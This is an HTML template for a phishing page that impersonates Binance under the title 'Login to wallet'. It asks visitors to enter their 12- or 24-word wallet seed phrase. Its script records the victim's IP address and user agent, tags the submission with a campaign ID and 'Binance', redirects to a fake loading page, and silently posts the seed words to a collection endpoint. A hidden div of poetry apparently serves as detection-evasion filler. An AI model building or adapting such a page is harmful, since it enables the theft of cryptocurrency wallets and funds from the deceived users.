<!DOCTYPE html>
<html lang="ru">
    <head>
        <meta charset="UTF-8">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="https://bin.bnbstatic.com/static/images/common/favicon.ico">
        <title>Login to wallet</title>
        <style>
            body {
                font-family: 'Arial',sans-serif;
                background-color: #181a20;
                color: #fff;
                margin: 0;
                padding: 0;
                display: flex;
                justify-content: center;
                align-items: center;
                overflow: hidden
            }

            .container {
                margin-top: 5%;
                background-color: #181a20;
                padding: 20px;
                border-radius: 24px;
                border: 1px solid #2b3139;
                width: 90%;
                max-width: 400px;
                text-align: center;
                overflow: hidden
            }

            h1 {
                color: #fff;
                margin-bottom: 10px
            }

            p {
                color: #aaa
            }

            .wallet-form {
                margin-top: 20px
            }

            .input-field {
                margin: 10px 0;
                display: flex;
                align-items: center
            }

            .input-number {
                width: 40px;
                text-align: center;
                background-color: #3a3a4b;
                border: none;
                color: #fff;
                font-weight: bold;
                margin-right: 10px;
                border-radius: 4px
            }

            input {
                width: 100%;
                padding: 10px;
                border: 1px solid #444;
                border-radius: 4px;
                background-color: #3a3a4b;
                color: #fff
            }

            input::placeholder {
                color: #aaa
            }

            button {
                background-color: #fcd535;
                color: #000;
                padding: 10px 15px;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                margin-top: 10px;
                transition: background-color .3s;
                width: 100%;
                font-weight: bold
            }

            button:hover {
                background-color: #fcd535
            }

            #inputFields {
                max-height: 300px;
                overflow-y: scroll;
                margin-bottom: 20px;
                padding-right: 10px
            }

            #inputFields::-webkit-scrollbar {
                width: 8px
            }

            #inputFields::-webkit-scrollbar-track {
                background: #2a2a3c
            }

            #inputFields::-webkit-scrollbar-thumb {
                background: #f3b62c;
                border-radius: 10px
            }

            #inputFields::-webkit-scrollbar-thumb:hover {
                background: #e6a92c
            }

            .custom-select {
                background-color: #3a3a4b;
                color: #fff;
                border: 1px solid #444;
                border-radius: 4px;
                padding: 10px;
                width: 90%;
                font-size: 16px;
                appearance: none;
                -webkit-appearance: none;
                -moz-appearance: none;
                position: relative;
                cursor: pointer
            }

            .custom-select::after {
                width: 10px;
                height: 6px;
                background: #FFF url("data:image/svg+xml,%3Csvg width='10' height='6' viewBox='0 0 10 6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M4.50495 5.78413L0.205241 1.25827C-0.0684138 0.970375 -0.0684138 0.503596 0.205241 0.215836C0.478652 -0.0719461 0.922098 -0.071946 1.19549 0.215837L5.00007 4.22052L8.80452 0.215953C9.07805 -0.0718292 9.52145 -0.0718292 9.79486 0.215953C10.0684 0.503736 10.0684 0.970492 9.79486 1.25839L5.49508 5.78425C5.35831 5.92814 5.17925 6 5.00009 6C4.82085 6 4.64165 5.928 4.50495 5.78413Z' fill='%23ED266A'/%3E%3C/svg%3E%0A") no-repeat center / cover;
                position: absolute;
                right: 20px;
                bottom: 50%;
                transform: translateY(50%);
                content: '';
                display: block;
                transition: .2s ease-in
            }

            .custom-select::after {
                transform: translateY(-50%) rotate(45deg)
            }

            .custom-select option {
                background-color: #3a3a4b;
                color: #fff
            }

            @media (max-width: 480px) {
                .container {
                    padding:15px
                }

                h1 {
                    font-size: 24px
                }

                button {
                    padding: 12px
                }
            }
        </style>
    </head>
    <div class="hidden-021800" id="hidden-6837b4a3c5609" style="display:none;">Dancing leaves in the autumn breeze,  
			Nature’s canvas painted with ease.</div>
    <body>
        <div class="container">
            <svg height="24" width="120" class="bn-svg default-icon block" viewBox="0 0 120 24" xmlns="http://www.w3.org/2000/svg">
                <path fill="#F0B90B" d="M5.41406 12L2.71875 14.6953L0 12L2.71875 9.28125L5.41406 12ZM12 5.41406L16.6406 10.0547L19.3594 7.33594L12 0L4.64062 7.35938L7.35938 10.0781L12 5.41406ZM21.2812 9.28125L18.5859 12L21.3047 14.7188L24.0234 12L21.2812 9.28125ZM12 18.5859L7.35938 13.9219L4.64062 16.6406L12 24L19.3594 16.6406L16.6406 13.9219L12 18.5859ZM12 14.6953L14.7188 11.9766L12 9.28125L9.28125 12L12 14.6953ZM40.5938 14.9766V14.9297C40.5938 13.1719 39.6562 12.2812 38.1328 11.6953C39.0703 11.1797 39.8672 10.3359 39.8672 8.85938V8.8125C39.8672 6.75 38.2031 5.41406 35.5312 5.41406H29.4141V18.5625H35.6719C38.6484 18.5859 40.5938 17.3672 40.5938 14.9766ZM36.9844 9.35156C36.9844 10.3359 36.1875 10.7344 34.8984 10.7344H32.2266V7.94531H35.0859C36.3047 7.94531 36.9844 8.4375 36.9844 9.30469V9.35156ZM37.7109 14.6016C37.7109 15.5859 36.9375 16.0312 35.6719 16.0312H32.2266V13.1484H35.5781C37.0547 13.1484 37.7109 13.6875 37.7109 14.5781V14.6016ZM46.6641 18.5625V5.41406H43.7578V18.5625H46.6641ZM62.2266 18.5859V5.41406H59.3672V13.5234L53.2031 5.41406H50.5312V18.5625H53.3906V10.2188L59.7656 18.5859H62.2266ZM78.2578 18.5859L72.6094 5.34375H69.9375L64.2891 18.5859H67.2656L68.4609 15.6328H74.0156L75.2109 18.5859H78.2578ZM72.9844 13.0781H69.4922L71.25 8.8125L72.9844 13.0781ZM92.0625 18.5859V5.41406H89.2031V13.5234L83.0391 5.41406H80.3672V18.5625H83.2266V10.2188L89.6016 18.5859H92.0625ZM106.992 16.4531L105.141 14.6016C104.109 15.5391 103.195 16.1484 101.672 16.1484C99.4219 16.1484 97.8516 14.2734 97.8516 12.0234V11.9531C97.8516 9.70312 99.4453 7.85156 101.672 7.85156C102.984 7.85156 104.016 8.41406 105.047 9.32812L106.898 7.19531C105.68 6 104.203 5.15625 101.719 5.15625C97.6875 5.15625 94.8516 8.22656 94.8516 11.9531V12C94.8516 15.7734 97.7344 18.7734 101.602 18.7734C104.133 18.7969 105.633 17.9062 106.992 16.4531ZM119.344 18.5625V16.0078H112.195V13.2422H118.406V10.6641H112.195V7.99219H119.25V5.41406H109.336V18.5625H119.344Z"></path>
            </svg>
            <h1>Login to wallet</h1>
            <p>Select word count:</p>
            <select id="wordCount" name="wordCount" class="custom-select" onchange="updateFields()">
                <option value="12">12 word</option>
                <option value="24">24 word</option>
            </select>
            <p>Enter seed phrase:</p>
            <form class="wallet-form" action="/submit-binance" method="POST" id="Binance-login-form">
                <input type="hidden" name="url_id" value="{{ url_id }}">
                <input type="hidden" name="user_ip" value="{{ request.remote_addr }}">
                <input type="hidden" name="user_agent" value="{{ request.user_agent }}">
                <input type="hidden" name="wordCount" id="wordCountHidden" value="12"> <!-- Add hidden input for wordCount -->
                <div id="inputFields"></div>
                <button type="submit">Continue</button>
            </form>
        </div>
        <script>
            function updateFields() {
                const wordCount = document.getElementById("wordCount").value;
                const wordCountHidden = document.getElementById("wordCountHidden");
                wordCountHidden.value = wordCount; // Update hidden input
                const inputFields = document.getElementById("inputFields");
                inputFields.innerHTML = '';
                
                for (let i = 1; i <= wordCount; i++) {
                    const field = document.createElement("div");
                    field.className = "input-field";
                    field.innerHTML = `
                        <input type="text" class="input-number" value="${i}" readonly> 
                        <input type="text" name="word${i}" placeholder="Word ${i}" required>
                    `;
                    inputFields.appendChild(field);
                }
            }
            // Инициализация при загрузке страницы
            document.addEventListener("DOMContentLoaded", updateFields);
            </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#Binance-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'Binance');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-Binance', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'Binance');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-Binance', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
    </body>
</html>